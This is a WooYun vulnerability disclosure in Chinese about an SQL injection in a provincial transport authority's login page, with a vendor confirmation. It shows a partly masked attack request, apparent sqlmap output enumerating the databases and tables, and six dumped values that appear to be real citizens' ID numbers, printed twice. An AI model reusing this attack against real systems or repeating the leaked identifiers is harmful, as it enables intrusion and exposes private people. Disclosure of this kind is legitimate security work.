当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0182877

漏洞标题:某省交通运输厅SQL注射涉及190万驾驶人员敏感信息

相关厂商:某省交通运输厅

漏洞作者: 路人甲

提交时间:2016-03-10 11:16

修复时间:2016-04-24 14:55

公开时间:2016-04-24 14:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-10: 细节已通知厂商并且等待厂商处理中
2016-03-10: 厂商已经确认,细节仅向厂商公开
2016-03-20: 细节向核心白帽子及相关领域专家公开
2016-03-30: 细节向普通白帽子公开
2016-04-09: 细节向实习白帽子公开
2016-04-24: 细节向公众公开

简要描述:

rt

详细说明:



mask 区域


*****/Login*****


sql注射

POST /login.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer:


mask 区域


*****.*******







Content-Length: 136
Content-Type: application/x-www-form-urlencoded
User-Agent: Googlebot/2.1 (+http://**.**.**.**/bot.html)
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: 





mask 区域


*****.*******







Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
btnLogin=%b5%c7%c2%bd&tbxName=1111oy&tbxPass=g00dPa%24%24w0rD&txt_ID=&__VIEWSTATE=/wEPDwULLTE5MjUyMzM4MzN*******P3Pkmk9Z*****


available databases [27]:
[*] CTXSYS
[*] HBYGJORA
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TEMP
[*] TXL
[*] WKSYS
[*] WMSYS
[*] XDB


Database: HBYGJORA
[79 tables]
+-------------+
| AAAAA       |
| AP_ARCHIVES |
| AP_DRIVER   |
| AP_FIXING   |
| AP_FLOW     |
| AP_FLOWSTEP |
| AP_LATTER   |
| AP_LATTERMX |
| AP_LIB      |
| AP_LINE     |
| AP_MANAGE   |
| AP_PRINT    |
| AP_SDHZ     |
| AP_VEHICLE  |
| AP_WORKDAY  |
| AP_WORKFLOW |
| CLJCDA      |
| CYHBZJL     |
| CYPXKSCJ    |
| CYRYDA      |
| CYRYPXDA    |
| CYTJ_YGC    |
| CYTJ_YGJ    |
| FBTZ        |
| GSNR        |
| H_BZJL      |
| H_DZJL      |
| H_GHJL      |
| H_GXJL      |
| H_SYJL      |
| KH_CYRY     |
| KH_CYZGZ    |
| KH_CYZGZJY  |
| KH_CYZGZKH  |
| KH_JSYWZJL  |
| KH_WSWZJL   |
| LIB_BCLB    |
| LIB_CLLX_DJ |
| LIB_CLQD    |
| LIB_CYLB    |
| LIB_CYSQZL  |
| LIB_JSYFZ   |
| LIB_JYFW    |
| LIB_JYFWFL  |
| LIB_RYLB    |
| LIB_WXCYLB  |
| LIB_XLJB1   |
| LIB_XZQH    |
| LIB_ZJCX    |
| M_GLDW      |
| PDF_XK      |
| PHY_MXB     |
| PHY_TJB     |
| PKY_MXB     |
| PKY_TJB     |
| PRINT_LOG   |
| PZ_FF       |
| PZ_KC       |
| PZ_SY       |
| S_ZJBHB     |
| S_ZJBM      |
| S_ZJCSB     |
| TYCLDA      |
| TYYHDA      |
| USERPURVIEW |
| W_CHARTLIB  |
| W_GLLBS     |
| W_IDFORMAT  |
| W_LIBITEMS  |
| W_LIBTITLES |
| W_LIB_JWPDB |
| W_MENU      |
| W_RPTBILL   |
| W_RPTDOC    |
| XLDA        |
| YHDA        |
| YH_BHZJL    |
| YH_NSJL     |
| Z           |
+-------------+


Database: HBYGJORA
+----------+---------+
| Table    | Entries |
+----------+---------+
| KH_CYZGZ | 1905179 |
+----------+---------+


[11:07:08] [INFO] fetching columns 'SFZH' for table 'KH_CYZGZ' in database 'HBYG
JORA'
[11:07:08] [INFO] the SQL query used returns 1 entries
[11:07:08] [INFO] resumed: SFZH
[11:07:08] [INFO] resumed: VARCHAR2
[11:07:08] [INFO] fetching entries of column(s) 'SFZH' for table 'KH_CYZGZ' in d
atabase 'HBYGJORA'
[11:07:08] [INFO] resumed: 133024600109361
[11:07:08] [INFO] resumed: 133026540725361
[11:07:08] [INFO] resumed: 133023550627527
[11:07:08] [INFO] resumed: 133001541201001
[11:07:08] [INFO] resumed: 13302819580815141X
[11:07:08] [INFO] resumed: 13302419620427201x

漏洞证明:

Database: HBYGJORA
[79 tables]
+-------------+
| AAAAA       |
| AP_ARCHIVES |
| AP_DRIVER   |
| AP_FIXING   |
| AP_FLOW     |
| AP_FLOWSTEP |
| AP_LATTER   |
| AP_LATTERMX |
| AP_LIB      |
| AP_LINE     |
| AP_MANAGE   |
| AP_PRINT    |
| AP_SDHZ     |
| AP_VEHICLE  |
| AP_WORKDAY  |
| AP_WORKFLOW |
| CLJCDA      |
| CYHBZJL     |
| CYPXKSCJ    |
| CYRYDA      |
| CYRYPXDA    |
| CYTJ_YGC    |
| CYTJ_YGJ    |
| FBTZ        |
| GSNR        |
| H_BZJL      |
| H_DZJL      |
| H_GHJL      |
| H_GXJL      |
| H_SYJL      |
| KH_CYRY     |
| KH_CYZGZ    |
| KH_CYZGZJY  |
| KH_CYZGZKH  |
| KH_JSYWZJL  |
| KH_WSWZJL   |
| LIB_BCLB    |
| LIB_CLLX_DJ |
| LIB_CLQD    |
| LIB_CYLB    |
| LIB_CYSQZL  |
| LIB_JSYFZ   |
| LIB_JYFW    |
| LIB_JYFWFL  |
| LIB_RYLB    |
| LIB_WXCYLB  |
| LIB_XLJB1   |
| LIB_XZQH    |
| LIB_ZJCX    |
| M_GLDW      |
| PDF_XK      |
| PHY_MXB     |
| PHY_TJB     |
| PKY_MXB     |
| PKY_TJB     |
| PRINT_LOG   |
| PZ_FF       |
| PZ_KC       |
| PZ_SY       |
| S_ZJBHB     |
| S_ZJBM      |
| S_ZJCSB     |
| TYCLDA      |
| TYYHDA      |
| USERPURVIEW |
| W_CHARTLIB  |
| W_GLLBS     |
| W_IDFORMAT  |
| W_LIBITEMS  |
| W_LIBTITLES |
| W_LIB_JWPDB |
| W_MENU      |
| W_RPTBILL   |
| W_RPTDOC    |
| XLDA        |
| YHDA        |
| YH_BHZJL    |
| YH_NSJL     |
| Z           |
+-------------+


Database: HBYGJORA
+----------+---------+
| Table    | Entries |
+----------+---------+
| KH_CYZGZ | 1905179 |
+----------+---------+


[11:07:08] [INFO] fetching columns 'SFZH' for table 'KH_CYZGZ' in database 'HBYG
JORA'
[11:07:08] [INFO] the SQL query used returns 1 entries
[11:07:08] [INFO] resumed: SFZH
[11:07:08] [INFO] resumed: VARCHAR2
[11:07:08] [INFO] fetching entries of column(s) 'SFZH' for table 'KH_CYZGZ' in d
atabase 'HBYGJORA'
[11:07:08] [INFO] resumed: 133024600109361
[11:07:08] [INFO] resumed: 133026540725361
[11:07:08] [INFO] resumed: 133023550627527
[11:07:08] [INFO] resumed: 133001541201001
[11:07:08] [INFO] resumed: 13302819580815141X
[11:07:08] [INFO] resumed: 13302419620427201x

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-10 14:55

厂商回复:

非常感谢!
你提交的漏洞已验证,会尽快修复。

最新状态:

暂无